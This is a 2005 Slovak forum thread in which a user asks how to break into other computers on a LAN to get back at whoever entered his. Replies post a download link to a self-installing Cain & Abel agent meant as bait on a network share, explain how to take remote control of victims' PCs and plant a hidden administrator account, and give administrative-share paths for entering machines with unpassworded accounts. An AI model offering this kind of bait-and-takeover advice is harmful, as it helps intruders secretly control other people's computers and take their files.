Pristup na PC v sieti LAN

Všetko o sieťach, nastaveniach, problémoch ...
Užívateľov profilový obrázok
odin
Používateľ
Používateľ
Príspevky: 785
Dátum registrácie: Št 03. Mar, 2005, 20:00
Bydlisko: Nitra (34)
Kontaktovať užívateľa:

Pristup na PC v sieti LAN

Príspevok od užívateľa odin » So 15. Okt, 2005, 12:16

je mozne sa dako dostat do pocitaca v sieti lan?akoze na hardisk a nieco od neho stahovat a tak.
CPU Dual-Core E5200@2.5GHz 3.6GHz | Chladiè SCYTHE Ninja 2| MB GIGABYTE EP35-DS3L | RAM 4,0GB RAM DDR2 A-DATA 800MHz Extreme Edition Vitesta | VGA GIGABYTE ATI Radeon HD 2600XT | HDD WD 640 GB SATA II | Lite-On DH-20A1L SATA | CaseThermaltake VI1000BNS M9| Zdroj SEASONIC SS-500ET-F3, 500W | Klávesnica multimedia Chicony | Mouse logitech laser MX510| 19" LCD ACER V193WAb |

Užívateľov profilový obrázok
pionier
Nový používateľ
Nový používateľ
Príspevky: 64
Dátum registrácie: So 06. Nov, 2004, 14:00
Bydlisko: košice

Príspevok od užívateľa pionier » So 15. Okt, 2005, 12:18

ked to da zdielat tak ano

Užívateľov profilový obrázok
odin
Používateľ
Používateľ
Príspevky: 785
Dátum registrácie: Št 03. Mar, 2005, 20:00
Bydlisko: Nitra (34)
Kontaktovať užívateľa:

Príspevok od užívateľa odin » So 15. Okt, 2005, 12:20

no ale ked to nie je zdielane ?
CPU Dual-Core E5200@2.5GHz 3.6GHz | Chladiè SCYTHE Ninja 2| MB GIGABYTE EP35-DS3L | RAM 4,0GB RAM DDR2 A-DATA 800MHz Extreme Edition Vitesta | VGA GIGABYTE ATI Radeon HD 2600XT | HDD WD 640 GB SATA II | Lite-On DH-20A1L SATA | CaseThermaltake VI1000BNS M9| Zdroj SEASONIC SS-500ET-F3, 500W | Klávesnica multimedia Chicony | Mouse logitech laser MX510| 19" LCD ACER V193WAb |

w0rm0n
Používateľ
Používateľ
Príspevky: 253
Dátum registrácie: Ut 22. Mar, 2005, 20:00

Príspevok od užívateľa w0rm0n » So 15. Okt, 2005, 13:01

-----
Naposledy upravil/-a w0rm0n v Po 01. Apr, 2013, 23:09, upravené celkom 1 krát.

Užívateľov profilový obrázok
robour
VIP
VIP
Príspevky: 2687
Dátum registrácie: So 26. Jún, 2004, 14:00
Bydlisko: Trstená
Kontaktovať užívateľa:

Príspevok od užívateľa robour » So 15. Okt, 2005, 15:14

odin napísal:no ale ked to nie je zdielane ?
KeD to nie je zdielane tak to neuvidia. Zdielanie sa da zapnut jednoducho.Kliknes na zlozku ,das vlasnosti hore v okne najdes Zdielanie. Potom vtom okne stlacis povolit iba zdielanie suborov (bez sprievodcu). Vzniknu ti 2 policka . Pri zakliknuti oboch je to pristupne komplet (teda ti to mozu aj zmazat) pri zakliknuti horneho policka je to obmedzene iba na citanie a kopirovanie.
MTB: ASUS Crosshair VI Hero X370 CPU: AMD Ryzen 5 2600 : Noctua NH U9B RAM: G.SKILL 16GB KIT 3200MHz CL16 Aegis : Sapphire AMD Radeon HD6770: SSD: Samsung 970 Evo 500GB NVme M.2 HDD: Seagate SSHD 2TB ST2000DX001 PSU: Seasonic Focus 550W LCD: Eizo 19"

Užívateľov profilový obrázok
odin
Používateľ
Používateľ
Príspevky: 785
Dátum registrácie: Št 03. Mar, 2005, 20:00
Bydlisko: Nitra (34)
Kontaktovať užívateľa:

Príspevok od užívateľa odin » Ne 16. Okt, 2005, 12:09

to ja viem ale mne sa dako dostali na disk lebo ja som nemal nic zdielane .Tak aj ja sa im chcem dostat na disk .
CPU Dual-Core E5200@2.5GHz 3.6GHz | Chladiè SCYTHE Ninja 2| MB GIGABYTE EP35-DS3L | RAM 4,0GB RAM DDR2 A-DATA 800MHz Extreme Edition Vitesta | VGA GIGABYTE ATI Radeon HD 2600XT | HDD WD 640 GB SATA II | Lite-On DH-20A1L SATA | CaseThermaltake VI1000BNS M9| Zdroj SEASONIC SS-500ET-F3, 500W | Klávesnica multimedia Chicony | Mouse logitech laser MX510| 19" LCD ACER V193WAb |

Užívateľov profilový obrázok
Jerry
VIP
VIP
Príspevky: 2755
Dátum registrácie: Ut 22. Feb, 2005, 20:00
Bydlisko: Trenčín
Kontaktovať užívateľa:

Príspevok od užívateľa Jerry » Ne 16. Okt, 2005, 13:02

Tak sa ich spytaj, ze ako sa tam dostali ... :lol: Mozno to prezradia.
Core 2 Duo E8400 Gigabyte 8800 GTS/512 • Gigabyte X38-DS4 • 4GB DDR2 320 GB SpinPoint F1
DVD-RW SH-S183LSeasonic S12-500 • Creative I-Trigue L3800Win 7 64 bit

w0rm0n
Používateľ
Používateľ
Príspevky: 253
Dátum registrácie: Ut 22. Mar, 2005, 20:00

Príspevok od užívateľa w0rm0n » Ne 16. Okt, 2005, 13:05

-----
Naposledy upravil/-a w0rm0n v Po 01. Apr, 2013, 23:09, upravené celkom 1 krát.

w0rm0n
Používateľ
Používateľ
Príspevky: 253
Dátum registrácie: Ut 22. Mar, 2005, 20:00

Príspevok od užívateľa w0rm0n » Po 17. Okt, 2005, 18:09

-----
Naposledy upravil/-a w0rm0n v Po 01. Apr, 2013, 23:09, upravené celkom 1 krát.

Užívateľov profilový obrázok
Patko19
Používateľ
Používateľ
Príspevky: 1072
Dátum registrácie: Pi 22. Apr, 2005, 20:00
Bydlisko: prievidza
Kontaktovať užívateľa:

Príspevok od užívateľa Patko19 » Ut 18. Okt, 2005, 18:11

spravil som ti jeden samorozbalovaci rar, ktory sa sam nainstaluje ako proces.

Kód: Vybrať všetko

www.marioboy2.ic.cz/abel.exe
daj to zdielat na sieti a uvidis kolko ludi nato klikne a bude chciet vedet co to je.
potom stiahni CAIN
www.oxid.it
v caine je zabudovany aj abel, ale ten uz bude mat uplne niekto iny a cain ho detekuje na sieti a potom snim mozes ovladat cudzie PC na sieti.
napriklad si mozes cez siet unho pridat noveho uzivatela ktoreho heslo budes mat len ty a mozes sa nan bezproblemov napojit a ten chudak ani vediet nebude a ani nebude o tom uzivatelovy vediet. toto si chcel, ci nie ???
ja som si niekedy robil srandu ze som restartoval PC prikazom restart
ak by si si nahodou toho abela nainstaloval, tak ho odinstalujes prikazom v adresary c:\windows\system32
napises abel -r
r ako remove :)
priemne rabovanie HDD :)

Užívateľov profilový obrázok
5o
Používateľ
Používateľ
Príspevky: 444
Dátum registrácie: Ne 09. Okt, 2005, 20:00
Bydlisko: Poltár

Príspevok od užívateľa 5o » Št 01. Dec, 2005, 13:42

Rad by som vedel ako to funguje. ako sa pripojim na dalsie pc a ako rabujem jeho hdd?
Naposledy upravil/-a 5o v St 14. Dec, 2005, 21:46, upravené celkom 1 krát.
PC: CPU: AMD Ryzen 5 1600 | MB: Gigabyte B450M DS3H | Monitor: 27" HP 27fw | SSD: Kingston SSD Now V300 120GB | HDD: WD RED 6TB | RAM: HyperX 16GB KIT DDR4 2666 MHz CL16 FURY series | VGA: GeForce GTX 1050Ti 2GB GDDR5|OS: Windows 10 64-bit
NB ACER ASPIRE E17: CPU: Intel Core i5-7200U | Displej: 17.3" 1920x1080 FHD | HDD: Seagate 1TB | RAM: 2x8 GB DDR4 2400MHz | VGA: GeForce 940MX 2GB GDDR5|OS: Windows 10 64-bit | Repro: Home Theater LG BH7430P
MOBILE: smarthopne: IPhone Xr 64GB space grey

Užívateľov profilový obrázok
DiwaSwina
Používateľ
Používateľ
Príspevky: 1420
Dátum registrácie: Po 28. Júl, 2003, 08:00
Bydlisko: Banska Bystrica
Kontaktovať užívateľa:

Príspevok od užívateľa DiwaSwina » Pi 02. Dec, 2005, 10:24

w0rm0n napísal:No dobre...
Nastroje/pripojit sietovu jednotku
a syntax je:
bud takto \\56.6.142.153\C
alebo \\56.6.142.153\C$
potrebujes user name a password k tomu kompu Tebe sa tam asi dostali cez nezaheslovaneho administratora.
P.S. to opacne lomitko je alt+92 a cash je alt+36
mne to neslo a btw. je toto s pravidlami pretaktovania ?? neopravneny zasah do cudzieho pc ??? pokial ma firewall dostanem sa na jeho pc ??

Užívateľov profilový obrázok
Pali_Di
Ban
Ban
Príspevky: 27
Dátum registrácie: So 20. Aug, 2005, 20:00
Bydlisko: Bratislava, 5trzalka
Kontaktovať užívateľa:

Príspevok od užívateľa Pali_Di » Pi 02. Dec, 2005, 14:09

w0rm0n napísal:No dobre...
Nastroje/pripojit sietovu jednotku
a syntax je:
bud takto \\56.6.142.153\C
alebo \\56.6.142.153\C$
potrebujes user name a password k tomu kompu Tebe sa tam asi dostali cez nezaheslovaneho administratora.
P.S. to opacne lomitko je alt+92 a cash je alt+36
To je nic lepsi je ten prispevok od Patko19 lebo tento neni 100%ny malo kto ma nezaheslovaneho administratora na mojej sieti ktora ma cez 100 uzivatelov sa dostanem pomocou tohoto \\192.168.1.12\C$ len velmi malej casti mozno tak 2% a okrem toho Firewall ma hned odhali ze sa tam ripem 8)
The way it's meant to be played 3Dfx 4ever!

Užívateľov profilový obrázok
PoPKoRn
Nový používateľ
Nový používateľ
Príspevky: 11
Dátum registrácie: So 03. Dec, 2005, 20:00
Kontaktovať užívateľa:

Príspevok od užívateľa PoPKoRn » Št 08. Dec, 2005, 23:12

Na nasej sieti ma tez kazdy heslo.... :( Inaac to heslo ktore tam odomna pyta to je heslo ktore si uzivatel zada na svoje konto vo WIN? :)
PC ktory skladam:CPU:AMD Athlon 64 3.0+ / MB:DFI nF4 Ultra INFINITY / RAM:2x 512 MB PC 400 KINGSTON CL.2.5 / VGA: ATI Radeon X800GTO FierBlade 256MB PCI-E TV DVI /DVD-RW :NEC 4550 / HDD: Hitachi 160 GB / zdroj a skrinku este nemam vybratu / MONITOR : NEOVO X-17

Užívateľov profilový obrázok
Patko19
Používateľ
Používateľ
Príspevky: 1072
Dátum registrácie: Pi 22. Apr, 2005, 20:00
Bydlisko: prievidza
Kontaktovať užívateľa:

Príspevok od užívateľa Patko19 » Pi 09. Dec, 2005, 17:33

podla mna ten kazdy co ma to heslo ho vlastne vobec ma. ak je sam v domacnosti tak si nebude davat heslo sam pre seba. je to len zdrziavanie casu. a ked ma nastaveny pocitac ze sa mu sam zapina v urcitu hodinu a zacne stahovat tak by to heslo musel zadavat rucne, alebo ma autologin.
takze podla mna staci zadat heslo administrator a bude to fungovat.
ale ten cain dokaze zistit heslo aj po sieti, takze by to nemal byt problem. keby mi siel cain na x64 tak by som ti otom napisal aj dost dlhsi prispevok ako na heslo uzivatela v sieti lan ale bohuzial mi cain na tomto systeme nejde.

Napísať odpoveď

Návrat na "Siete"